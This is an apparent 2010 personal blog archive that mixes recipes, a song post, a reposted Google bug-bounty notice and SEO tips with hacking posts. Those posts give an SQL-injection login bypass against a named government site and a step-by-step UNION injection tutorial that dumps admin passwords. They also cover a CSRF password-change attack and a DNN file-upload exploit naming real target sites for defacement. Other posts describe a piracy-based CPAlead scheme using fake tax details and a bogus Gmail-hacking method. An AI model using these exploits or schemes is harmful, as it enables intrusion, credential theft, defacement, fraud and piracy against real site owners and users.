Enable Javascript to access this page. Arena of An Artist: 2010
rss
twitter
    Find out what I'm doing, Follow Me :)

Sunday, December 26, 2010

Tango Spanish Style Scrambled Eggs by Ashish

So one of the Oldest Dishes made by me and Too Simple.. even a child can make it at Home. This is a Fusion of Indian and Spanish Taste and Cooking. And when I made this Dish first time.. I was quite Proud of myself. Come On.. I was just 13 Years old.. :P. In This Recipe...Tomatoes are doing the Magic.


INGREDIENTS-
  • Eggs: 2
  • Tomatoes ( Medium Sized ): 2-3 Chopped
  • Onion ( Medium Sized ): 1 Chopped
  • Capsicum ( Medium Sized ): 1 Chopped
  • Green Chillies: 2 Cut into Half along length
  • Ginger: 20gms Chopped
  • Spring Onion: 1-2 Copped
  • Red Chili Powder: to Taste ( in my case I love Spicy :P)
  • Salt: to Taste
  • Cinnamon: 1 Teaspoon
  • Pepper: 1 Teaspoon
  • Olive Oil: 1 Tablespoon
  • Mustard Seeds: 9-10
  • Coriander Leaves
PROCEDURE:

  1. Take a Pan and put Oil in it. wait for it to get Heated up.
  2. Add Mustard Seeds and see the Magic. ( if you are new in Kitchen :P )
  3. Add Onions, Ginger and Green Chili and Cinnamon
  4. Wait for Onions to get Golden Brown and then add Tomato, Capsicum, Spring Onion.
  5.  Add Salt, Red Chili Powder, Pepper.
  6. Wait for Things to get along well and then Add two Eggs directly in it.
  7. Beat the Eggs inside with Everything well.
  8. When Egg gets Cooked Well turn Off the Gas Stove and Place the ready Eggs in a Plate
  9. Garnish with Coriander Leaves.
Taste Best with Tomato Sauce and also as filling in Sandwiches.

Enjoy Cooking..!

Wednesday, December 8, 2010

BSNL website HACKED by Ashish :)

BSNL Hacked by Simple SQLi .. Never thought this much BIG Govt. site will be vulnerabe to suach a Chindi thing :P


http://www.topnews.in/files/BSNL-India-.jpg

See Yourself.. 

go here
LINK 1

or
 

LINK 2

simply Enter

' or '1'='1

In password field

and





ENJOY..!
 
NOTE: It is for educational Purpose Only

Saturday, December 4, 2010

TERI BEWAFAYI- Awesome Song by Deep SEnses

Amazing Punjabi Rap song
Touched me in my Heart When I first Heard it
I listen to it almost 10 times Everyday

I bet If you have Loved Someone in your life... You will go mad for this song...



Please Leave Nice Comments if you like the Song

Saturday, November 6, 2010

Guaranteed Method to Hack a gmail account

first get a hacking tool no need to worry where to find just go to http://www.youtube.com and search "Runescape Hacker" or "Runescape Hacker Download Link"

you will get the downloading link in comments zone

now you have downloaded the hacker tool but -Don't open the Runescape Hacker Tool, It may be Backd00red Instead place it in a Safe area!

download and install hexworkshop now dont ask for link...google is your friend

now right click on tool ,,you will see "Edit this with HexWorkshop"...click it

you will see a mess of words and alphabets symbols....dont worry dont get confused believe me its easy to do!

now press ctrl+f... a boz will appear

-Now Before start Finding Anything Make sure you change the "Hex" to "String" value.

-Now Enter "Gmail" to the Box and Hit "Find".

-You will Get Popping Up a Black area. Don't touch it. Instead see on your Right for the Texts.

-Copy the Highlighted text and Paste it in a Text document (Newly Created).

-Remove the [.]>DOTs and You will see The Email ID + the Passwd.

Njoy Hacking!!

Google pays for finding bugs in orkut, youtube, blogger etc.

Rewarding web application security research


 http://www.google.co.in/images/logos/ps_logo2.png
Back in January of this year, the Chromium open source project launched a well-received vulnerability reward program. In the months since launch, researchers reporting a wide range of great bugs have received rewards — a small summary of which can be found in the Hall of Fame. We've seen a sustained increase in the number of high quality reports from researchers, and their combined efforts are contributing to a more secure Chromium browser for millions of users.

Today, we are announcing an experimental new vulnerability reward program that applies to Google web properties. We already enjoy working with an array of researchers to improve Google security, and some individuals who have provided high caliber reports are listed on our credits page. As well as enabling us to thank regular contributors in a new way, we hope our new program will attract new researchers and the types of reports that help make our users safer.

In the spirit of the original Chromium blog post, we have some information about the new program in a question and answer format below:

Q) What applications are in scope?
A) Any Google web properties which display or manage highly sensitive authenticated user data or accounts may be in scope. Some examples could include:

* *.google.com
* *.youtube.com
* *.blogger.com
* *.orkut.com

For now, Google's client applications (e.g. Android, Picasa, Google Desktop, etc) are not in scope. We may expand the program in the future.

Q) What classes of bug are in scope?
A) It's difficult to provide a definitive list of vulnerabilities that will be rewarded, however, any serious bug which directly affects the confidentiality or integrity of user data may be in scope. We anticipate most rewards will be in bug categories such as:

* XSS
* XSRF / CSRF
* XSSI (cross-site script inclusion)
* Bypassing authorization controls (e.g. User A can access User B's private data)
* Server side code execution or command injection

Out of concern for the availability of our services to all users, we ask you to refrain from using automated testing tools.

These categories of bugs are definitively excluded:

* attacks against Google’s corporate infrastructure
* social engineering and physical attacks
* denial of service bugs
* non-web application vulnerabilities, including vulnerabilities in client applications
* SEO blackhat techniques
* vulnerabilities in Google-branded websites hosted by third parties
* bugs in technologies recently acquired by Google

Q) How far should I go to demonstrate a vulnerability?
A) Please, only ever target your own account or a test account. Never attempt to access anyone else's data. Do not engage in any activity that bombards Google services with large numbers of requests or large volumes of data.

Q) I've found a vulnerability — how do I report it?
A) Contact details are listed here. Please only use the email address given for actual vulnerabilities in Google products. Non-security bugs and queries about problems with your account should should instead be directed to the Google Help Centers.

Q) What reward might I get?
A) The base reward for qualifying bugs is $500. If the rewards panel finds a particular bug to be severe or unusually clever, rewards of up to $3,133.7 may be issued. The panel may also decide a single report actually constitutes multiple bugs requiring reward, or that multiple reports constitute only a single reward.

We understand that some researchers aren’t interested in the money, so we’d also like to give you the option to donate your reward to charity. If you do, we'll match it — subject to our discretion.

Regardless of whether you're rewarded monetarily or not, all vulnerability reporters who interact with us in a respectful, productive manner will be credited on a new vulnerability reporter page. If we file a bug internally, you'll be credited.

Superstar performers will continue to be acknowledged under the "We Thank You" section of this page.

Q) How do I find out if my bug qualified for a reward?
A) You will receive a comment to this effect in an emailed response from the Google Security Team.

Q) What if someone else also found the same bug?
A) Only the first report of a given issue that we had not yet identified is eligible. In the event of a duplicate submission, only the earliest received report is considered.

Q) Will bugs disclosed without giving Google developers an opportunity to fix them first still qualify?
A) We believe handling vulnerabilities responsibly is a two-way street. It's our job to fix serious bugs within a reasonable time frame, and we in turn request advance, private notice of any issues that are uncovered. Vulnerabilities that are disclosed to any party other than Google, except for the purposes of resolving the vulnerability (for example, an issue affecting multiple vendors), will usually not qualify. This includes both full public disclosure and limited private release.

Q) Do I still qualify if I disclose the problem publicly once fixed?
A) Yes, absolutely! We encourage open collaboration. We will also make sure to credit you on our new vulnerability reporter page.

Q) Who determines whether a given bug is eligible?
A) Several members of the Google Security Team including Chris Evans, Neel Mehta, Adam Mein, Matt Moore, and Michal Zalewski.

Q) Are you going to list my name on a public web page?
A) Only if you want us to. If selected as the recipient of a reward, and you accept, we will need your contact details in order to pay you. However, at your discretion, you can choose not to be listed on any credit page.

Q) No doubt you wanted to make some legal points?
A) Sure. We encourage broad participation. However, we are unable to issue rewards to individuals who are on sanctions lists, or who are in countries (e.g. Cuba, Iran, North Korea, Sudan and Syria) on sanctions lists. This program is also not open to minors. You are responsible for any tax implications depending on your country of residency and citizenship. There may be additional restrictions on your ability to enter depending upon your local law.

This is not a competition, but rather an experimental and discretionary rewards program. You should understand that we can cancel the program at any time, and the decision as to whether or not to pay a reward has to be entirely at our discretion.

Of course, your testing must not violate any law, or disrupt or compromise any data that is not your own.

Thank you for helping us to make Google's products more secure. We look forward to issuing our first reward in this new program.

Saturday, October 30, 2010

Spice unviels 3D phone

The emerging mobile company ‘Spice’ has become the first mobile company to launch 3D display mobile handsets in India. The new mobile hand set is lashed with several peculiar functions with the stunning function of 3D display screen named “View D”.

As per report of sources, View D makes user capable of experiencing images, videos and even the interface in 3D. The mobile hand set is laced with a specific kind of display screen know as auto-stereoscopic display and it will make the users to experience the 3D view without polarizer glasses(3D glasses).

Apart from the 3D display the handset is equipped with many other attractive features. The display of the mobile is designed in such a way that user can have its choice whether to enjoy the 2D or 3D view. The mobile has also an eccentric characteristic know as ‘remote wipe’ which deletes the mobile data remotely. This is done by sending a unique sms (the sms works as a command to delete the data) to the mobile phone.

Sleek and gorgeous looking View D is equipped with 2.4-inch screen; fine sound quality integrated speakers, 2MP camera, FM radio, MP3 player, GPRS, WAP and 16 GB expandable memory. The price of the stylish is Rs 4299.
At a press conference, the CEO of Spice Mobiles Mr. Kunal Ahuja said that the Spice View D would fulfill the latest demands of smart mobile phone users. He further added that they were very keen to bring something innovative, something technically cool and the latest launch satisfied their eagerness




Overview Body Type Bar
Battery Life/Talk time 4.5 Hours
Standby Talktime 260 Hours
Dimensions Width 51 mm
Depth 13 mm
Length 115 mm
Weight 70 g
Camera Camera Yes
Camera Resolution 2 MP
Display Display Size 2.3 inches
Display Resolution 240 x 320 pixels
Dispaly Type TFT LCD
Memory
Card Slot Yes
Complimentary Card N/A
Multimedia Features FM Radio Yes
MMS Yes
MP3 Player Yes
Connectivity Options
Bluetooth Yes
USB Connector Yes
GPRS Yes
WAP Yes
Technology Cellular Network GSM
SIM Type Dual SIM
Features Input Type Alphanumeric Keypad
Handsfree Speaker Yes


 

Twitter Followers, Facebook Likes, Visitors

Website :- http://twiends.com


Its about :- Increasing Twitter Followers, Getting Facebook Page Likes as well as Visitors for your site. (For Free)


How does twiends works ?

twiends.com provides introductions to people looking for friends and followers. We use a fair credit system to create the incentive for you to check someone out. When you follow someone you earn credits from them, and vica versa when they follow you. You can decide how many credits you want to offer per follow, and when you run out you remain on the list so people can still follow you if they like. We focusing on making the introduction, and you focus on deciding who you want to be friends with in the long run. Despite our name, we are not a "get followers fast" site or a follower train. You get to choose who you friend and they get to do the same. In saying that though, you will find that a lot people will follow you because you are on the site. Our focus is community building.

Give it a try.. It really works.. :)

SQL Injection Tutorial

SQL injection is a code that exploits a vulnerability in the database of a website.

Step 1

Firstly we will find a site which is vulnerable to SQLI .

So surf the site till u get to a URL which looks like this -:

www . prateek . com/articles/index.php?id=213

By this i mean a url ending with something like this "php?id=213"

Now to check weder the site is vulnerable or not , we add a ' sign at the end of the URL.

Example = > www . prateek . com/articles/index.php?id=213'

If we get an error like this "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1"
or similar it means the site is vulnerable to SQLI.

Ok so now we will proceed to the next step

Step 2

Finding the number of columns , now we will find the number of columns with the ORDER BY command.

Example = >www . prateek . com/articles/index.php?id=213 order by 10--

So here we added the number 10 assuming that there are 10 colomns.
If the site does not have 10 columns it will give an error "Unknown column '10' in 'order clause'"
Ok this means that the number of coloms is less than 10 .So we continue to test by decreasing the number.

Example ==> www . prateek . com/articles/index.php?id=213 order by 9--
www . prateek . com/articles/index.php?id=213 order by 8--
www . prateek . com/articles/index.php?id=213 order by 7--
www . prateek . com/articles/index.php?id=213 order by 6--
www . prateek . com/articles/index.php?id=213 order by 5--


Step 3
Now when we test it for 5 columns it does not give an error and if we test it for 6 it gives an error which means that the number of columns is 5.

So now as we know that there are 5 coiumns we will now use the UNION ALL command.
EXAMPLE = >
www . prateek . com/articles/index.php?id=213 union all select 1,2,3,4,5--

As there were 5 columns we selected all the 5 columns.

When we execute this URL then on the page there will be number(s) displayed.

Like 2 or 3 or 4 etc.(This will not be greater than the number of columns)
Step 4
Now the number which appeared we have to remember it as we will use it in the next step.

Let us assume that number 3 appeared.

So now we will check the version of MYSQL with the help of this number

Example - www . prateek . com/articles/index.php?id=213 union all select 1,2,@@version,4,5--


We used the @@version command to find out the version bieng used.

We replaced the number 3 (as we had got it in the last step) with @@version

Now after executing this the version number will be displayed.
Step 5
like = > 5.0.51a-community

Now as the version is above 5 its fine.

Now we will find the names of columns and tables.

This will be done by -:

Example URL => www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=databse()--

After executing this , names of tables will be displayed.

It maybe anything .

Not them down. (choose names having admin , username , user etc in them)

Now we will find the names of columns

Example URL = > www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema=databse()--

After executing this , names of columns will be displayed.

It maybe anything .

Not them down. (choose names having password, username , pass etc in them)

you might think what happens when you don't see a column like username or password?

then you have to do a little guessing.

Step 6

Now we will move further.

And place the names of columns and tables we noted down in the URL

Example = > www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(username,0x3a,password),4,5 from admin--

In the above URL username is the column named username or user or admin etc. Similarly password is also a column. and the end part ie from admin (means the TABLE).

Thats it execute the URL and you will get the password in HASH (most probably , but if you are lucky you can even get it normally.)

Thanks for reading my tutorial hope you liked it.  

Friday, August 27, 2010

Convert Your 1Gb Memory Card To 2Gb Free

Procedure:
1) First of all we have to make sure that its a 1 GB memory card. This only works on 1GB And it supports only in some of the rare cases of memory cards.
2) Now Backup all your data in that because we have to format the drive.
3) After backing up now open the Skimedi Fix 2GB Capacity application. i will upload a link at the end of post.
4) A small window will pop up showing the FIX and Cancel option. And you have to browse the drive where it is located (generally G: or L: drive for USB sticks)




5) After selecting the drive press on FIX and then the updating process will be followed up. It will ask your conformation whether you agree to format or not. click on yes.
6) Later it will ask to replug the device. Just replug the memory stick card and put it back. The size of the memory will be increased from 1Gb to 2Gb. you can see the properties before and after the cracking process.
7) After that you can also check the memory size in phone and also you can test the size by copying all the data to it which is around 2Gb.
8) I personally tested this and now i have converted my 1Gb to 2Gb and using 1.8 space with no problem.




9) You can reopen the Skimedi Fix and select the drive again where it shows us the size as 1912mb which is nothing but 2Gb.
10) Some times we get a parameter error while copying the files which have crossed the 1Gb size so this may not be 100% successful.
http://ougfiles.com/dl/82885090/skimedi_fix.rar

Friday, August 20, 2010

CPAlead complete setup tutorial

Chapter one

what is CPAlead?

CPAlead is no joke, Couple of my friends have been with CPAlead for over 1 year now and have made roughly 30,000$ ever since, one in particular his name is Alex he is a twenty two year old college drop out, his parents stopped supporting him when he dropped out he was left with a small apartment and literally 230$ in his pocket. He discovered CPAlead one night and from that night on it was a wrap, He's raking in about 7,000$ a month till this day, He has taught me the rules of trade pretty much everything I know, Now I'm teaching you guys! Everyday I browse the "monetizing techniques" I see threads like "Need help making $$" and plenty more, That is the only reason I'm making this tutorial, for the unfortunate people who don't know how to code a language, for the people who think posting adylf links is bringing in a decent income for them, for the people who beg for money..I guarantee that you will make money if you follow this guide word-for-word. Still not convinced? Here is some proof CPAlead is a cash pot..When you register for CPAlead there's a chatbox and you can see what people earn daily, monthly and lifetime..


Chapter two

getting started

Before we begin the thing first you will need to do is register to CPAlead, If you haven't already, you can start by going Here | Here The second link is my referral link, I don't expect you to register under me nor is it mandatory but it helps me just a little, but the choice is yours. Registering to CPAlead is a little tricky because it's solely based on if you get accepted or not, the biggest obstacle for most people is the tax-document procedure they require you to fill out. When you fill out the tax document it's recommended you use real information but it's not enforced. I personally used fake information and got accepted in three or four business days

After you've registered on CPAlead and activated your e-mail with your account, it's best for for your self to get familiar and comfortable with the dashboard AKA control panel. The first thing I advise you to do is go to the to "Account" located on the menu bar. When your there your going to see general payment information choose the minimum pay out you would like to receive and also choose your preferred payment type (I suggest choosing the lowest because you are new to CPAlead) Next you should see PayPal payment information put your PayPal E-Mail there (only if you choose to paid via PayPal of course) That's it for now, I've pretty much covered the most important things to setting up your account, Let's move on shall we?

Chapter three

competition

You need to find what your going to monetize. Finding something to monetize is very easy but at the same time very difficult, Why? One word competition, Let me make an example..If there's ~30 million people on the internet less then 1 million users are internet marketers or make money off the internet (These numbers are not correct they are based off estimates) Why does this matter? Finding some monetize is luck it's based off how much competition you have and your content. Let's say you decide to monetize "Weight loss supplements" Overweight and obesity is the #1 problem in America, Meaning 40% of the users on the internet will search "weight loss pills" "pills that make you loose weight" "weight loss diet" Take a look at these images this is information taken from Google Keyword tool (I will explain this beautiful tool in detail further we go into the tutorial)





Take a look at the first image, You see "weight loss pills" 550,000 searches in two weeks* The competition is at an all time high. Look at the second images, Just like I said America is the country that "weight loss pills" has been searched the most, Anything dealing with "Weight loss" will always be an automatic hit, it will never die out, BUT there is a lot of competition for this which is a bad idea but if you have unique and pay for advertising then you make can make tons of money off this but since your new I strongly recommend you stay away from anything that has competition. Monetizing anything like that takes a lot of experience which I will not go into detail with, In the next chapter we will set up your first CPAlead ad and explain how to you how you can find your own.

Chapter four

your first monetize

So it's time to set up your first CPAlead advertisement. CPAlead pays you a certain amount of cash for every time someone does your survey the amount can be anywhere from 00.01 to 5.00$ Finding what to monetize is a vital part. Below I will write a brief summery on finding what to monetize

Finding what to monetize: The most easiest thing to monetize is with down-loadable content such as software; software is something that people are always trying to get for free: When finding what kind of software to monetize it's best to choose software that people are paying for already, meaning if people value the software enough that they're paying money of their wallet it's going to be worth doing one survey to get it. Basically you just have to make sure whatever your going out for free it's worth the time that people will spend 5 minutes filling out a survey.

So with that being said, we're going to be monetizing "Software" as an example to all of you for this tutorial. Now finding the right type of software you want to look for popular best-selling type soft; A really good method on finding what are the best selling software is by heading over to Amazon.com then go to the software section and click on best sellers.




The image above shows the top 8 software best-sellers (out of 100) Now if you were to create a site for all 8 sites that will guarantee you at least 100$ weekly. So after you found what software your going to monetize you will need to create a website for it and add your CPAlead widget to it.

For this tutorial I will be monetizing (Adobe Photoshop Elements 8) as an example to all of you. 
 
Chapter five

building and advertising

Before we being the advertising your going to need a couple things

* Youtube Account
* Webhosting
* Windows movie maker


After you've gathered all everything stated above we can begin the process of advertising.

The video
Creating the right type of video is vital, "A picture is worth a thousand words" in this case it's worth your income, but wait were doing a video what does a picture have to do with it? Remember what software I was going to monetize? it was Adobe Photoshop Elements 8


“adobe photoshop elements 8 free download” results 1 - 20 of about 93


Adobe photoshop elements 8 does not have a lot of competition, there's only about ~100 videos of people giving out free, that is good thing! Why? Less people giving it out means more money for you! You have to take advantage of this.

It's time to set up the advertisement. This is where the list of things you needed comes in handy, a youtube account, windows movie maker and free/paid web hosting.

Ahead over to Google and under images search what the software your going to monetize with, for this tutorial we're monetizing Adobe Photoshop Elements 8

Here are some very very good examples of what to use in your video, those images will appear in your thumbnail, when they look at the thumbnail they're going to see the actual program view from the desktop so it'll make it more believable. After you've found the right image save it to your computer and open up Windows movie maker, click on import media and find the image. Timing; You have to make sure your video is at least 1 minutes and 30 seconds long why? Put your self in your customers shoes for a moment. If you were looking for software would you rather go to a 40 second video containing a link to an anonymous download site OR would you rather look at a video that is 2 minutes long video. Exactly you have to do what ever it takes for them to just click on your link. (you get paid for how many people visit and click your surveys as well) Music is optional, I personally prefer soft music to breed trust and calm vibes, if you put a rap/rock what will the user think about a song "Kill Kill 666 money hookers drugs guns"



Your out come should look something like this, remember to expand the time to at least 2 minutes long. It's optional to add titles or credits saying "Link in description" I usually don't cause the users should have the common sense to check the description box, if you do decide to add annotations use the youtube feature instead.

Uploading to Youtube. When your finish editing your video in windows movie maker you can go ahead and upload it to youtube.

Keywords. Without keywords no-one will be able to find your video so you need to make sure that you have the right title and keywords. For the title I suggest you putting something along this line

* FREE Adobe Photoshop Elements 32/64 BIT FREE
* Adobe Photoshop Elements 8 - Key-gen w/ Download
* Adobe Photoshop Elements 8 w/ Commentary
* Free Adobe Photoshop Elements 8 Download
 
Choosing the right keywords for your video is a very important step. I have provided some useful tools to choosing the right keyword for your video.

Google AdWords
https://adwords.google.com/o/Targeting/Explorer?__u=1000000000&__c=1000000000&stylePrefOverride=2#search.none!ideaType=KEYWORD&requestType=IDEAS

Search-base keyword tool
http://www.google.com/sktool/

Google Adwords: Traffic Estimator
https://adwords.google.com/select/TrafficEstimatorSandbox

Free Keyword suggestion tool for SEO, AdWords or blogging
http://freekeywords.wordtracker.com/

Free Search Term Suggestion Tool
http://www.keyworddiscovery.com/search.html

That pretty much sums everything that has to be done with video, we'll now be working on the actual website and how design/set it up.

Your Website

Building your website is very easy. You have 2 choices here, you can either redirect people to your website or create a blog and redirect them there, I personally redirect them to my blogspot then to my domain, here is an ideal look for your blog.
-
If you don't like bogs you can go with creating a simple HTML page, make sure you add a breif summery of the product and a retail box picture of the software just like I had one in my blog. *You can't add CPAlead widgets to blogspots you need to redirect them to your actual site*



I recommend you don't buy a domain like a .info or .com or .net..you should stick with free host web sites for now, when you become more experienced and have more knowledge with monetizing techniques and find your own niches you should invest ~20$ for a .com and web hosting, this is only good for one niche for example if I bought abc.com that is only good for movie advertisement.  
 
finding software

Now of course your going to have to find software to give out to your users, this is easy you can either use Torrentz or Warez forums. DO NOT UPLOAD TO YOUR WEBHOST. You need to link them to the rapidshare link or torrentz link, never never have the actual download from you web host, this will lead to copy right problems.




CPAlead widget

Here comes to easiest part of the tutorial! Building your CPAlead is easy but there are some rules that you will have to follow, which benefits you 100% Ahead over to CPAlead and go to the control panel. Click "Widgets"

Create new widget > File Download > Web page containing file(s)
Instructions on how to set up your CPAlead widget.













End result



ITs All Done

Enjoy
 

Tuesday, August 10, 2010

The Power Of Keywords


It is here by popular demand !! :-) Even if you know every bit of it, reading wouldn't make you feel that your time was wasted! Lets not talk much and come straight to the point.


__________________________________
__________________________________

What Are Key words?



Keywords are words or phrases normal people like you and me use to search stuff online. Keyword Analysis is seeing your blog through the reader's eye and making certain amendments in blog posts to hover that x-tra traffic. Simple isn't it? :->

We like to keep it simple !! B-)


_____________________________________________________________________

How to do Keyword Analysis



There are many keyword analysis tools on the internet, but the most preferred, best and accurate one is Google Adwords Keyword Tracker which you can find here -

https://adwords.google.com/o/Targeting/Explorer?__u=1000000000&__c=1000000000&ideaRequestType=KEYWORD_IDEAS#search.none

Go there and you would easily figure out what to do. There is a box on the top left corner that read 'Word or phrase (one per line)' , enter as many keywords or phrases you want to use. If you want to check weather a domain is good with keywords there is an option for that too just next to the previous one. Don't worry if you dont get it next post will be very well explanatory!! :-)
 

How To Use Keyword Analysis



Okay, so after you go there, you can search whatever you want and you would be amazed to see the result. Always try for something that has less competition, good number of visitors and which is interesting enough for you to blog about ! :-)

I searched Article Marketingand here is a little short cut of the result. Please note that not only keyword that i chose but also related keywords show up with competition and number of searches and so on.

Check out this screen shot - http:// img7.imageshack. us/img7/2032/48567444.jpg

Now, I liked the second result. Many people search for it and it is gaining boom day by day so how about writing a piece of article with it? I am not going to write a complete article , but would rather give hints so that you can analyze it for future use, because you don't write about the same thing as I do !!


_______________________________________________________________

Writing Blog Post After Analyzing Keywords



Okay so i chose Article Marketing Strategy to write on. Lets see how to use it.

So the very first thing I would do is writing my heading. I would probably go for - The Secrets Of Online Marketing Strategy - Revealed

Catching, isn't it? :-> Straightforwardly telling search engines and off course the reader, that this is what my blog has to offer. No fuzz, remember - we like to keep it simple ! :D

After that, start you blog post and include the same keyword (Article Marketing Strategy) in the middle of your post and once in the end. How long the post is doesn't matter at all !! The inclusion of keyword MUST not look deliberate and stuffed, and hence for that you have to alter you writing a bit. Also, don't stuff keyword again and again, search engines are cleverer than you. Your blog may face a BAN !! :|
 
That's not all. You can also include popular keywords in that search in your blog post, but still remember not to use it very much. 3% to 5% is highly recommended. Go to this link where you can track the percentage of keyword in your article !! :D

http://live-keyword-analysis.com/

So that's all from me. I have touched the basic and believe me that is all you need, nothing else. Practice this for sometime and you would be a pro at this craft without even realizing it. And + the traffic would be better than ever.

Thank You for reading !! :-)
 
 

Saturday, August 7, 2010

Cross-Site Request Forgery

Cross-Site Request Forgery

Alright, before I begin, I'd like start out by clearing up some common misconceptions about of CSRF (pronounced "Sea Surf" or simply C-S-R-F). Most people believe that CSRF is the same as Cross Site Scripting, also known as XSS, due to both of these types of attacks having the phrase "Cross Site" in them. This couldn't be further from the truth. CSRF and XSS are both COMPLETELY different attack vectors. With XSS, the attacker inserts some text, such as Javascript code, onto the vulnerable site by sending the victim a prepared link. An example of this would be

alert('whatevergoeshere').

With CSRF, however, the victim sends the attacker's request to the server without them even knowing about it. I'll explain this in a bit.

Cross-Site Request Forgery

Alright, before I begin, I'd like start out by clearing up some common misconceptions about of CSRF (pronounced "Sea Surf" or simply C-S-R-F). Most people believe that CSRF is the same as Cross Site Scripting, also known as XSS, due to both of these types of attacks having the phrase "Cross Site" in them. This couldn't be further from the truth. CSRF and XSS are both COMPLETELY different attack vectors. With XSS, the attacker inserts some text, such as Javascript code, onto the vulnerable site by sending the victim a prepared link. An example of this would be

alert('whatevergoeshere').

With CSRF, however, the victim sends the attacker's request to the server without them even knowing about it. I'll explain this in a bit. 

What is cross site request forgery?

Cross-site request forgery is also known as CSRF works by exploiting the trust that a site has for the user. Site tasks are usually linked to specific urls allowing specific actions to be executed when it’s requested. If a user is logged into the site and an attacker will be able to trick their browser into making a request to one of these task urls, then the task is performed and logged as the logged in user. The CSRF vulnerability lies in most every Website, but it has remained mostly under the radar for nearly a decade — it’s not even included in the Web Security Threat Classification, OWASP Top 10 or Mitre Corp.’s . One of indonesian security expert, zoiz , even says that CSRF ’s able to cause DOS attack against webserver by manipulating the amounts of GET request. well , it’s really horrible

How does it works?

One possible way of using CSRF to attack a website would be to lure your victim to your website with a simple image tag that will log your victim out of a site. You could do this using;
<*img src="http://websiteyouwantthemloggedoutof.com/logout.php" height="1" width="1" /*>

This of course will simply log them out of the site they are logged into that you have chosen. You, of course, would need to know which site that you want them logged out of to use this. Of course, this is a pointless task, but it's simply to show the basic logic behind a CSRF attack. You can use this basic concept for other things, such as removing funds out of your victims financial account and transferring it into yours, deleting users from a specific site, etc.

So know we want to use this vulnerability for our own advantage.

How about changing the user’s password?

Ok so to change the user’s password you need first to create an account in the vulnerable website.
Then, go to the change the password page.
Consider that the webpage url is

http://websiteyouwantthemloggedoutof.com/reset.php

And when you change your password it will be

http://wwebsiteyouwantthemloggedoutof.com/reset.php?pass=gtfobc

(we consider that we have changed the password to gtfobc) 

After that we go to our avatar to change it

Usually they will ask you two things:
1-upload an image (you don’t need it or maybe you can use it to upload your shell but chances of making this attack work are low but worth a try)
2-image from a url (here we will use it)

So we will put “/reset.php?pass=gtfobc”(without the quotation marks) in the url for the avatar.

(We didn’t use http://websiteyouwantthemloggedoutof.com/reset.php?pass=gtfobc cause you are in the site you are not redirecting him from another site)
And press ok.

Now if the user wants to check you avatar he wont see a thing (a blank page or an error).

But what the victim doesn’t know is that his password was changed to “gtfobc”.
The rest is easy.

That's it for this tutorial, I'm not going to spoon feed you information, this information is MORE than enough to help you on your way to, do whatever you want. :)

secret backdoors to many websites

Secret Backdoor To Many Websites

Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first....
The lesson you should have learned here is: Obviously Google can go where you can't.

Can we solve this problem? Yes, we can. We merely have to convince the site we want to enter, that WE ARE GOOGLE.
In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.
Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.
How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.

CODE:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"


Voila! You're done!

You may always change it back again.... I know only one site that uses you User Agent to establish your eligability to use its services, and that's the Windows Update site...
To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:

CODE:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Ps:
Opera allows for on-the-fly switching of User Agents through its "Browser Identification" function, while for Mozilla/FireFox browsers a switching utility is available as an installable extension

Hack Website Using DNN [Dot Net Nuke] Exploit

Hack Website Using DNN [Dot Net Nuke] Exploit

Note:- Only for educational purpose
Using google DORK try to find the vulnerable website.

inurl:"/portals/0"

You can also modify this google dork according to your need & requirement
I have found these 2 website vulnerable to this attack:
http://www.wittur.se/

http://www.bsd405.org/


n00bs can also try both of these websites for testing purpose.
Open the home page and check any image which is located in /portals/0/
Check the location of the image. It should be located in /portals/0/

For e.g. in case of  http://www.wittur.se ..the image is located at location- http*://www.wittur.se/Portals/0/SHM.jpg*
Waaooo it means this website is vulnerable and we can change the front page pic. Now the current image name is SHM.jpg.
Rename the new image as SHM.jpg which you want to upload as a proof of you owned the system.

Now here is the exploit
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspxHOW TO RUN ?
Simply copy paste it as shown below:

www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site
After selecting the third option, replace the URL bar with below script

For script click here http://tinypaste.com/af8b9

After running this JAVA script, you will see the option for Upload Selected File Now select you image file which you have renamed as SHM.jpg & upload here. Go to main page and refresh...BINGGOOOOOOOOOOOO you have hacked the website.



Increase your adsense earning : MUST READ

What is Adsense Revenue Sharing Program
This method is particularly useful for those people who dont have a running blog so couldn't get much through adsense.This method is called Adsense Revenue Sharing program.


Have already heard anything about Revenue Sharing Sites?
Revenue Sharing Sites are sites which place ads (particularly from adsense) of its members throughout its website. The site ads and the member’s ads impressions will be divided according to the site’s rules. Revenue Sharing Sites can be a Social networking, Forum or Article Marketing Website.

